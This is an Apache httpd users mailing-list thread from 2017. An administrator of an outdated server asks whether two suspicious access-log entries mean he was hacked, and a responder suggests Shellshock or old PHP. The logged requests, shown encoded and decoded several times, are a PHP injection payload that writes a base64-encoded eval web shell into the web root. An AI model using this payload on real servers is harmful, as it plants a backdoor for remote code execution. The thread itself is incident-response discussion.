You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by "Lentes, Bernd" <be...@helmholtz-muenchen.de> on 2017/02/06 16:14:40 UTC
[users@httpd] am i hacked ?
Hi,
just in the moment i found two very weird entries in may access_log:
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
What upsets me is that these two requests have statuscode 200, which mean it was successfull.
The IP is from ukraine. Where can i find out what these %charcacters mean ? Does anyone understand what happened here ? It's apache 2.2.3 64bit.
Thanks for any hint.
Bernd
--
Bernd Lentes
Systemadministration
institute of developmental genetics
Gebäude 35.34 - Raum 208
HelmholtzZentrum München
bernd.lentes@helmholtz-muenchen.de
phone: +49 (0)89 3187 1241
fax: +49 (0)89 3187 2294
Erst wenn man sich auf etwas festlegt kann man Unrecht haben
Scott Adams
Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] am i hacked ?
Posted by "Lentes, Bernd" <be...@helmholtz-muenchen.de>.
----- On Feb 6, 2017, at 5:45 PM, Daniel dferradal@gmail.com wrote:
> Actually now that I re-read the requests it also looks as shellshock succesful
> attempt.
> Operative system software not updated recently either?
> 2017-02-06 17:42 GMT+01:00 Daniel < dferradal@gmail.com > :
>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.
>> Do you use a very old php version as well?
Everything is old. php, OS, apache. This is to my account. It's a system i nearly oversaw, because we use it very rarely.
But nevertheless, it should be updated. I know. And i learn.
>>> What i find out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUME
>>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';
>>> Currently i don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>>> network which includes this ip.
>>> Thankful for any tip.
Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] am i hacked ?
Posted by Daniel <df...@gmail.com>.
Actually now that I re-read the requests it also looks as shellshock
succesful attempt.
Operative system software not updated recently either?
2017-02-06 17:42 GMT+01:00 Daniel <df...@gmail.com>:
> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz-
> muenchen.de>:
>
>>
>> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
>> muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment i found two very weird entries in may access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
>> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_
>> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%
>> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
>> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27
>> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>> > HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have statuscode 200, which
>> mean it was
>> > successfull.
>> > The IP is from ukraine. Where can i find out what these %charcacters
>> mean ? Does
>> > anyone understand what happened here ? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What i find out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>> '->|';file_put_contents($_SERVER['DOCUME
>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>> '|<-';
>>
>> Currently i don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>> network which includes this ip.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>
>>
>> Helmholtz Zentrum Muenchen
>> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
>> Ingolstaedter Landstr. 1
>> 85764 Neuherberg
>> www.helmholtz-muenchen.de
>> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
>> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
>> Enhsen
>> Registergericht: Amtsgericht Muenchen HRB 6466
>> USt-IdNr: DE 129521671
>>
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>
>
> --
> *Daniel Ferradal*
> IT Specialist
>
> email dferradal at gmail.com
> linkedin es.linkedin.com/in/danielferradal
>
--
*Daniel Ferradal*
IT Specialist
email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal
Re: [users@httpd] am i hacked ?
Posted by Daniel <df...@gmail.com>.
Have you tried to send those requests yourself and see what you get?
Still those requests seem to be aimed at your php framework.
Do you use a very old php version as well?
2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz-muenchen.de
>:
>
> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
> muenchen.de wrote:
>
> > Hi,
> >
> > just in the moment i found two very weird entries in may access_log:
> >
> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%
> 40set_time_limit%280%29%3B%40set_magic_quotes_runtime%
> 280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%
> 27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> > HTTP/1.1" 200 90
> >
> > What upsets me is that these two requests have statuscode 200, which
> mean it was
> > successfull.
> > The IP is from ukraine. Where can i find out what these %charcacters
> mean ? Does
> > anyone understand what happened here ? It's apache 2.2.3 64bit.
> >
> > Thanks for any hint.
> >
> > Bernd
> >
>
> What i find out already:
> https://url-encoder.de/ helped me to decode the URL:
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
> '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('
> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>
> Currently i don't understand what this means.
> I don't find a file webconfig.txt.php on my system.
> Currently no weird process, no new user in /etc/passwd, no packtes to the
> network which includes this ip.
>
> Thankful for any tip.
>
>
> Bernd
>
>
> Helmholtz Zentrum Muenchen
> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
> Ingolstaedter Landstr. 1
> 85764 Neuherberg
> www.helmholtz-muenchen.de
> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons
> Enhsen
> Registergericht: Amtsgericht Muenchen HRB 6466
> USt-IdNr: DE 129521671
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
--
*Daniel Ferradal*
IT Specialist
email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal
Re: [users@httpd] am i hacked ?
Posted by "Lentes, Bernd" <be...@helmholtz-muenchen.de>.
----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-muenchen.de wrote:
> Hi,
>
> just in the moment i found two very weird entries in may access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
>
> What upsets me is that these two requests have statuscode 200, which mean it was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>
What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip.
Thankful for any tip.
Bernd
Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org